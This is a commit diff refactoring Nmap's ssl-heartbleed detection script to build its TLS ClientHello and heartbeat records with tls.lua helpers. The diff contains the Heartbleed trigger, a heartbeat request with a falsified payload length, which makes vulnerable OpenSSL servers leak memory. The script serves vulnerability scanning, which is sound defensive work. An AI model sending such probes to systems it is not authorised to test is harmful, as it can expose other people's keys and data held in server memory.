Use tls.lua functions to build messages in ssl-heartbleed

2026-01-06 14:39:03 +00:00 · 2014-04-10 15:14:14 +00:00
parent 582afb7746
commit 3fd18f7752
1 changed files with 82 additions and 89 deletions
--- a/scripts/ssl-heartbleed.nse
+++ b/scripts/ssl-heartbleed.nse
@@ -68,96 +68,89 @@ local function recvmsg(s, len)
  return true, pay
 end

+local function keys(t)
+  local ret = {}
+  for k, _ in pairs(t) do
+    ret[#ret+1] = k
+  end
+  return ret
+end
+
 local function testversion(host, port, version)

-  local hello = bin.pack('H>SH', "16", version, table.concat(
-      {
-        "00 dc", -- record length
-        "01", -- handshake type ClientHello
-        "00 00 d8", -- body length
-        "03 02", -- TLSv1.1
-        "53 43 5b 90", -- date/time (Tue Apr  8 02:14:40 2014)
-        "9d9b720bbc0cbc2b92a84897cfbd3904cc160a8503909f770433d4de", -- random
-        "00", -- session ID
-        "00 66", -- cipher suites length (102 = 51 suites)
-        "c0 14", -- TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
-        "c0 0a", -- TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA
-        "c0 22", -- TLS_SRP_SHA_DSS_WITH_AES_256_CBC_SHA
-        "c0 21", -- TLS_SRP_SHA_RSA_WITH_AES_256_CBC_SHA
-        "00 39", -- TLS_DHE_RSA_WITH_AES_256_CBC_SHA
-        "00 38", -- TLS_DHE_DSS_WITH_AES_256_CBC_SHA
-        "00 88", -- TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA
-        "00 87", -- TLS_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA
-        "c0 0f", -- TLS_ECDH_RSA_WITH_AES_256_CBC_SHA
-        "c0 05", -- TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA
-        "00 35", -- TLS_RSA_WITH_AES_256_CBC_SHA
-        "00 84", -- TLS_RSA_WITH_CAMELLIA_256_CBC_SHA
-        "c0 12", -- TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA
-        "c0 08", -- TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA
-        "c0 1c", -- TLS_SRP_SHA_DSS_WITH_3DES_EDE_CBC_SHA
-        "c0 1b", -- TLS_SRP_SHA_RSA_WITH_3DES_EDE_CBC_SHA
-        "00 16", -- TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
-        "00 13", -- TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA
-        "c0 0d", -- TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA
-        "c0 03", -- TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA
-        "00 0a", -- TLS_RSA_WITH_3DES_EDE_CBC_SHA
-        "c0 13", -- TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
-        "c0 09", -- TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
-        "c0 1f", -- TLS_SRP_SHA_DSS_WITH_AES_128_CBC_SHA
-        "c0 1e", -- TLS_SRP_SHA_RSA_WITH_AES_128_CBC_SHA
-        "00 33", -- TLS_DHE_RSA_WITH_AES_128_CBC_SHA
-        "00 32", -- TLS_DHE_DSS_WITH_AES_128_CBC_SHA
-        "00 9a", -- TLS_DHE_RSA_WITH_SEED_CBC_SHA
-        "00 99", -- TLS_DHE_DSS_WITH_SEED_CBC_SHA
-        "00 45", -- TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA
-        "00 44", -- TLS_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA
-        "c0 0e", -- TLS_ECDH_RSA_WITH_AES_128_CBC_SHA
-        "c0 04", -- TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA
-        "00 2f", -- TLS_RSA_WITH_AES_128_CBC_SHA
-        "00 96", -- TLS_RSA_WITH_SEED_CBC_SHA
-        "00 41", -- TLS_RSA_WITH_CAMELLIA_128_CBC_SHA
-        "c0 11", -- TLS_ECDHE_RSA_WITH_RC4_128_SHA
-        "c0 07", -- TLS_ECDHE_ECDSA_WITH_RC4_128_SHA
-        "c0 0c", -- TLS_ECDH_RSA_WITH_RC4_128_SHA
-        "c0 02", -- TLS_ECDH_ECDSA_WITH_RC4_128_SHA
-        "00 05", -- TLS_RSA_WITH_RC4_128_SHA
-        "00 04", -- TLS_RSA_WITH_RC4_128_MD5
-        "00 15", -- TLS_DHE_RSA_WITH_DES_CBC_SHA
-        "00 12", -- TLS_DHE_DSS_WITH_DES_CBC_SHA
-        "00 09", -- TLS_RSA_WITH_DES_CBC_SHA
-        "00 14", -- TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA
-        "00 11", -- TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA
-        "00 08", -- TLS_RSA_EXPORT_WITH_DES40_CBC_SHA
-        "00 06", -- TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5
-        "00 03", -- TLS_RSA_EXPORT_WITH_RC4_40_MD5
-        "00 ff", -- TLS_EMPTY_RENEGOTIATION_INFO_SCSV (RFC 5746)
-        "01", -- compressors length
-        "00", -- NULL compressor
-        "00 49", -- extensions length
-        "00 0b", -- ec_point_formats
-        "00 04", -- ec_point_formats length
-        "03", -- point formats length
-        "00", -- ec_point_formats uncompressed
-        "01", -- ec_point_formats ansiX962_compressed_prime
-        "02", -- ec_point_formats ansiX962_compressed_char2
-        "00 0a", -- elliptic_curves
-        "00 34", -- elliptic_curves length
-        "00 32", -- elliptic curves length
-        "00 0e 00 0d 00 19 00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0f 00 10 00 11", -- elliptic_curves data (all curves)
-        "00 23", -- SessionTicket TLS
-        "00 00", -- SessionTicket length
-        "00 0f", -- heartbeat
-        "00 01", -- heartbeat length
-        "01", -- heartbeat data: peer_allowed_to_send
-      })
-    )
+  local hello = tls.client_hello({
+      ["protocol"] = version,
+      ["ciphers"] = {
+        "TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA",
+        "TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA",
+        "TLS_SRP_SHA_DSS_WITH_AES_256_CBC_SHA",
+        "TLS_SRP_SHA_RSA_WITH_AES_256_CBC_SHA",
+        "TLS_DHE_RSA_WITH_AES_256_CBC_SHA",
+        "TLS_DHE_DSS_WITH_AES_256_CBC_SHA",
+        "TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA",
+        "TLS_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA",
+        "TLS_ECDH_RSA_WITH_AES_256_CBC_SHA",
+        "TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA",
+        "TLS_RSA_WITH_AES_256_CBC_SHA",
+        "TLS_RSA_WITH_CAMELLIA_256_CBC_SHA",
+        "TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA",
+        "TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA",
+        "TLS_SRP_SHA_DSS_WITH_3DES_EDE_CBC_SHA",
+        "TLS_SRP_SHA_RSA_WITH_3DES_EDE_CBC_SHA",
+        "TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA",
+        "TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA",
+        "TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA",
+        "TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA",
+        "TLS_RSA_WITH_3DES_EDE_CBC_SHA",
+        "TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA",
+        "TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA",
+        "TLS_SRP_SHA_DSS_WITH_AES_128_CBC_SHA",
+        "TLS_SRP_SHA_RSA_WITH_AES_128_CBC_SHA",
+        "TLS_DHE_RSA_WITH_AES_128_CBC_SHA",
+        "TLS_DHE_DSS_WITH_AES_128_CBC_SHA",
+        "TLS_DHE_RSA_WITH_SEED_CBC_SHA",
+        "TLS_DHE_DSS_WITH_SEED_CBC_SHA",
+        "TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA",
+        "TLS_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA",
+        "TLS_ECDH_RSA_WITH_AES_128_CBC_SHA",
+        "TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA",
+        "TLS_RSA_WITH_AES_128_CBC_SHA",
+        "TLS_RSA_WITH_SEED_CBC_SHA",
+        "TLS_RSA_WITH_CAMELLIA_128_CBC_SHA",
+        "TLS_ECDHE_RSA_WITH_RC4_128_SHA",
+        "TLS_ECDHE_ECDSA_WITH_RC4_128_SHA",
+        "TLS_ECDH_RSA_WITH_RC4_128_SHA",
+        "TLS_ECDH_ECDSA_WITH_RC4_128_SHA",
+        "TLS_RSA_WITH_RC4_128_SHA",
+        "TLS_RSA_WITH_RC4_128_MD5",
+        "TLS_DHE_RSA_WITH_DES_CBC_SHA",
+        "TLS_DHE_DSS_WITH_DES_CBC_SHA",
+        "TLS_RSA_WITH_DES_CBC_SHA",
+        "TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA",
+        "TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA",
+        "TLS_RSA_EXPORT_WITH_DES40_CBC_SHA",
+        "TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5",
+        "TLS_RSA_EXPORT_WITH_RC4_40_MD5",
+        "TLS_EMPTY_RENEGOTIATION_INFO_SCSV",
+      },
+      ["compressors"] = {"NULL"},
+      ["extensions"] = {
+        -- Claim to support every elliptic curve
+        ["elliptic_curves"] = tls.EXTENSION_HELPERS["elliptic_curves"](keys(tls.ELLIPTIC_CURVES)),
+        -- Claim to support every EC point format
+        ["ec_point_formats"] = tls.EXTENSION_HELPERS["ec_point_formats"](keys(tls.EC_POINT_FORMATS)),
+        ["heartbeat"] = "\x01", -- peer_not_allowed_to_send
+      },
+    })

-  local hb = bin.pack('H>SH', '18', version, table.concat({
-        "00 03", -- record length
-        "01", -- HeartbeatType HeartbeatRequest
-        "0f e9", -- payload length (falsified)
-        -- payload length is based on 4096 - 16 bytes padding - 8 bytes packet header + 1 to overflow
-      })
+  local payload = "Nmap ssl-heartbleed"
+  local hb = tls.record_write("heartbeat", "TLSv1.1", bin.pack("C>SA",
+      1, -- HeartbeatMessageType heartbeat_request
+      0x0fe9, -- payload length (falsified)
+      -- payload length is based on 4096 - 16 bytes padding - 8 bytes packet
+      -- header + 1 to overflow
+      payload -- less than payload length.
+      )
    )

  local s
@@ -188,7 +181,7 @@ local function testversion(host, port, version)
  while(true) do
    local status, typ, ver, pay, len
    status, typ, ver, len = recvhdr(s)
-    if not status or ver ~= version then
+    if not status or ver ~= tls.PROTOCOLS[version] then
      return
    end
    status, pay = recvmsg(s, len)
@@ -247,7 +240,7 @@ OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1
    if nil == tls.PROTOCOLS[ver] then
      return "\n  Unsupported protocol version: " .. ver
    end
-    local status = testversion(host, port, tls.PROTOCOLS[ver])
+    local status = testversion(host, port, ver)
    if ( status ) then
      vuln_table.state = vulns.STATE.VULN
      break